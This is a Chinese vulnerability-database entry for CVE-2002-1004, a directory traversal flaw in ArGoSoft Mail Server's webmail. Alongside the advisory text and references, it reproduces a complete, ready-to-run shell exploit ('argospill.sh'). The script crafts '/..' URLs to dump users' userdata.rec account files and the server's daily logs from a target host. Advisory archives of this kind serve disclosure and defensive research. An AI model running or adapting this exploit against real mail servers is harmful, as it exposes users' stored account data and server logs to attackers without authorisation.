ArGoSoft Mail Server远程目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106833 漏洞类型 未知
发布时间 2002-07-06 更新时间 2006-09-27
CVE编号 CVE-2002-1004 CNNVD-ID CNNVD-200210-179
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-179
|漏洞详情
ArGoSoftMailServer是一款集成SMTP、POP3和Fingerd服务的系统,包含WEB服务程序可使远程用户通过WEB访问邮件,使用在MicrosoftWindows操作系统下。ArGoSoftMailServer的WEB服务对用户提交的URL请求缺少正确的过滤,远程攻击者可以利用这个漏洞进行目录遍历攻击。由于WEBMAIL服务器没有检查反向目录遍历,攻击者可以利用请求图象或者合法用户附件的方法,提交包含多个'/..'字符并追加要查看的系统文件名,可导致以WEBMAIL服务进程的权限查看请求的任意系统文件内容。此漏洞重现在ArGoSoftMailServer1.8.1.5版本中,其他版本也可能受这个漏洞影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/5144/info

ArGoSoft Mail Server is an STMP, POP3 and Finger server for Microsoft Windows environments. ArGoSoft has a built in web server to enable remote access to mail.

A directory traversal issue has been reported in the web server, which could allow remote users access to all files residing on the host.

This is accomplished by submitting a specially crafted request containing '/..' character sequences to a specific directory.

This issue is reported to exist in ArGoSoft Mail Server 1.8.1.5, earlier versions may also be affected by this issue.


#!/bin/sh
#
# released on 06/07/2002 by team n.finity <nfinity@gmx.net>
# find us at http://nfinity.yoll.net/
#
# argospill.sh

HOST=$1
USER=$2
DOMAIN=$3

startpro()
{
    echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
    URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startplus()
{
    echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
    URL=/$USER/_tempatt/../userdata.rec
    /usr/bin/lynx -dump http://$HOST$URL
}

startboth()
{
    echo -e "\nSpilling host $HOST (Plus / Pro)\n"
    URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
    /usr/bin/lynx -dump http://$HOST$URL
}

usage()
{
    echo -e "\nUsage:\n"
    echo "Both - $0 <host>"
    echo "Pro  - $0 <host> <user> <domain>"
    echo "Plus - $0 <host> <user>"
    echo -e "\nExample:\n"
    echo "Both, images dir - $0 www.test.com"
    echo "Plus, no dom req - $0 www.test.com me"
    echo "Pro, default dom - $0 www.test.com me _nodomain"
    echo "Pro, virtual dom - $0 www.test.com me test.com"
}

echo "Argospill 1.0 by Team N.finity"

if [ -n "$HOST" ]; then
    if [ -n "$USER" ]; then
        if [ -n "$DOMAIN" ]; then
            startpro
        else
            startplus
        fi
    else
        startboth
    fi
else
    usage
fi
|参考资料

来源:BID
名称:5144
链接:http://www.securityfocus.com/bid/5144
来源:XF
名称:argosoft-dotdot-directory-traversal(9477)
链接:http://www.iss.net/security_center/static/9477.php
来源:www.argosoft.com
链接:http://www.argosoft.com/applications/mailserver/changelist.asp
来源:BUGTRAQ
名称:20020703ArgosoftMailServerPlus/ProWebmailReverseDirectoryTraversal
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0029.html